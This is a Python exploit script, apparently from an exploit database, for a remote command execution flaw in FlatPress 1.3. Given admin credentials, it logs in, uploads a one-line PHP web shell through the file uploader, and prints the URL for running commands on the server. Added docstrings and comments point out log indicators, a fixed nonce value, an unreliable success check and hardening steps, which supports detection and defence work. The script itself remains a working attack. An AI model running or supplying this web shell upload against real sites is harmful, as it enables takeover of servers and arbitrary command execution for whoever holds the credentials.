## https://sploitus.com/exploit?id=PACKETSTORM:178208
# Exploit Title: FlatPress v1.3 - Remote Command Execution  
# Discovered by: Ahmet Ümit BAYRAM  
# Discovered Date: 19.04.2024  
# Vendor Homepage: https://www.flatpress.org  
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip  
# Tested Version: 1.3 (latest)  
# Tested on: MacOS  
  
import requests  
import time  
import random  
import string  
  
def random_string(length=5):
    """Return a string of `length` random lowercase ASCII letters.

    In this script the result becomes the base name of the uploaded file,
    so an unmodified run leaves a five-letter lowercase ``.php`` name behind.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return "".join(picked)
  
def login_and_upload(base_url, username, password):
    """Log in to a FlatPress admin panel and post a ``.php`` file to its uploader.

    Proof of concept for the issue named in the file header. The flow is:
    authenticate against ``login.php``, send one multipart part named
    ``upload[]`` to ``admin.php?p=uploader&action=default``, then print the
    URL under ``fp-content/attachs/`` where the script expects the file to
    be served.

    Notes for defenders reading this listing:

    * Precondition: working admin-panel credentials. The function returns
      as soon as the login response lacks the word "Logout".
    * Request pattern visible in access logs: POST ``/login.php``, POST
      ``/admin.php?p=uploader&action=default`` carrying a ``.php`` file
      name, then requests for ``/fp-content/attachs/<name>.php`` with a
      query parameter called ``0``.
    * Hardening that removes the impact: keep the web server from executing
      scripts in the attachments directory, reject script extensions in the
      uploader, and keep the set of accounts that can reach it small.

    Args:
        base_url: Host (plus optional path) without a scheme; ``http://`` is
            prepended, so the credentials are sent unencrypted.
        username: Account name posted as the ``user`` field.
        password: Password posted as the ``pass`` field.

    Returns:
        None. Progress and results are only printed.
    """
    filename = random_string() + ".php"
    site = f"http://{base_url}"
    login_endpoint = f"{site}/login.php"
    uploader_endpoint = f"{site}/admin.php?p=uploader&action=default"

    with requests.Session() as http:
        print("Exploiting...")
        time.sleep(1)

        # Login attempt.
        credentials = {
            'user': username,
            'pass': password,
            'submit': 'Login'
        }
        print("Logging in...")
        login_reply = http.post(login_endpoint, data=credentials)
        time.sleep(1)

        # A page without "Logout" is treated as a rejected login.
        if "Logout" not in login_reply.text:
            print("Login Failed!")
            print(login_reply.text)
            return
        print("Login Successful!")

        # File upload attempt.
        print("Shell uploading...")
        time.sleep(1)

        # Multipart file part and the accompanying form fields.
        upload_part = {
            'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        # The nonce is a constant, not fetched from the form first, so
        # unmodified copies of this script always send this exact value:
        # a usable indicator wherever request bodies are captured.
        uploader_fields = {
            '_wpnonce': '9e0ed04260',
            '_wp_http_referer': '/admin.php?p=uploader',
            'upload': 'Upload'
        }

        upload_reply = http.post(
            uploader_endpoint, files=upload_part, data=uploader_fields
        )

        # NOTE(review): "Upload" is matched on its own, so this branch can
        # report success without showing that the file was stored; the
        # printed message alone is not evidence of compromise.
        page = upload_reply.text
        if not ("File(s) uploaded" in page or "Upload" in page):
            print("Exploit Failed!")
            print(upload_reply.status_code, upload_reply.text)
            return

        shell_url = f"{site}/fp-content/attachs/{filename}"
        print(f"Your Shell is Ready: {shell_url}")
        time.sleep(1)
        print(f"Shell Usage: {shell_url}?0=command")
  
# Example usage: python script.py sitename.com username password
if __name__ == "__main__":
    import sys

    # Exactly three positional arguments are required; anything else only
    # prints the usage line.
    if len(sys.argv) == 4:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)
    else:
        print("Usage: script.py <base_url> <username> <password>")